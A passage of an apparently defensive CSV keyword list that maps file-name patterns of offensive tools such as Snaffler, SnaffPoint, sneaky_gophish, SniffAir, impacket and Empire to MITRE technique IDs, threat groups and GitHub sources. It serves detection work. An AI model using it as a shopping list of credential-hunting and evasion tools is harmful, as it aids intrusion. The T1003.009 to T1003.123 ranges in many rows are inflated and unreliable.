T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffCore/ActiveDirectory*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffCore/Classifiers*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffCore/Concurrency*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffCore/Config*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffCore/ShareFind*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffCore/TreeWalk*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*Snaffler.csproj*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1595 - T1592 - T1589 - T1590 - T1591,TA0043,N/A,N/A,Reconnaissance,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*Snaffler.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*snaffler.exe*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*snaffler.exe*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1595 - T1592 - T1589 - T1590 - T1591,TA0043,N/A,N/A,Reconnaissance,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*snaffler.log*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1595 - T1592 - T1589 - T1590 - T1591,TA0043,N/A,N/A,Reconnaissance,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*Snaffler.sln*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*Snaffler.sln*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1595 - T1592 - T1589 - T1590 - T1591,TA0043,N/A,N/A,Reconnaissance,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnafflerMessage.cs*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnafflerMessageType.cs*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffPoint.exe*,offensive_tool_keyword,SnaffPoint,A tool for pointesters to find candies in SharePoint,T1210.001 - T1087.002 - T1059.006,TA0007 - TA0002 - TA0006,N/A,N/A,Discovery,https://github.com/nheiniger/SnaffPoint,1,1,N/A,7,2,191,19,2022-11-04T13:26:24Z,2022-08-25T13:16:06Z -*SnaffPoint-main*,offensive_tool_keyword,SnaffPoint,A tool for pointesters to find candies in SharePoint,T1210.001 - T1087.002 - T1059.006,TA0007 - TA0002 - TA0006,N/A,N/A,Discovery,https://github.com/nheiniger/SnaffPoint,1,1,N/A,7,2,191,19,2022-11-04T13:26:24Z,2022-08-25T13:16:06Z -*snallygaster*,offensive_tool_keyword,snallygaster,Finds file leaks and other security problems on HTTP servers.snallygaster is a tool that looks for files accessible on web servers that shouldn't be public and can pose a security risk.,T1595.001 - T1210,TA0007 - TA0009,N/A,N/A,Information Gathering,https://github.com/hannob/snallygaster,1,0,N/A,N/A,10,2009,240,2023-07-31T07:26:19Z,2018-04-10T12:01:16Z -*sneaky_gophish*,offensive_tool_keyword,gophish,Hiding GoPhish from the boys in blue,T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/puzzlepeaches/sneaky_gophish/,1,1,N/A,10,10,134,37,2022-12-06T11:58:00Z,2021-06-24T12:41:54Z -*SniffAir*,offensive_tool_keyword,SniffAir,SniffAir is an open-source wireless security framework which provides the ability to easily parse passively collected wireless data as well as launch sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic. looking for potential security flaws. Along with the prebuilt queries. SniffAir allows users to create custom queries for analyzing the wireless data stored in the backend SQL database. SniffAir is built on the concept of using these queries to extract data for wireless penetration test reports. The data can also be leveraged in setting up sophisticated wireless attacks included in SniffAir as modules.,T1530 - T1170 - T1059 - T1201,TA0002 - TA0003 - TA0007 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Tylous/SniffAir,1,1,N/A,N/A,10,1161,175,2020-10-14T04:00:27Z,2017-02-20T18:32:32Z -*sniffer.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*sniffer-master.zip*,offensive_tool_keyword,sniffer,A modern alternative network traffic sniffer.,T1040 - T1052.001 - T1046 - T1552.002,TA0011 - TA0007 - TA0005,N/A,N/A,Sniffing & Spoofing,https://github.com/chenjiandongx/sniffer,1,1,N/A,N/A,7,668,58,2022-07-27T15:13:57Z,2021-11-08T15:36:03Z -*SnifferSpoofer*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*sniffglue*,offensive_tool_keyword,sniffglue,Secure multithreaded packet sniffer,T1040 - T1041 - T1046 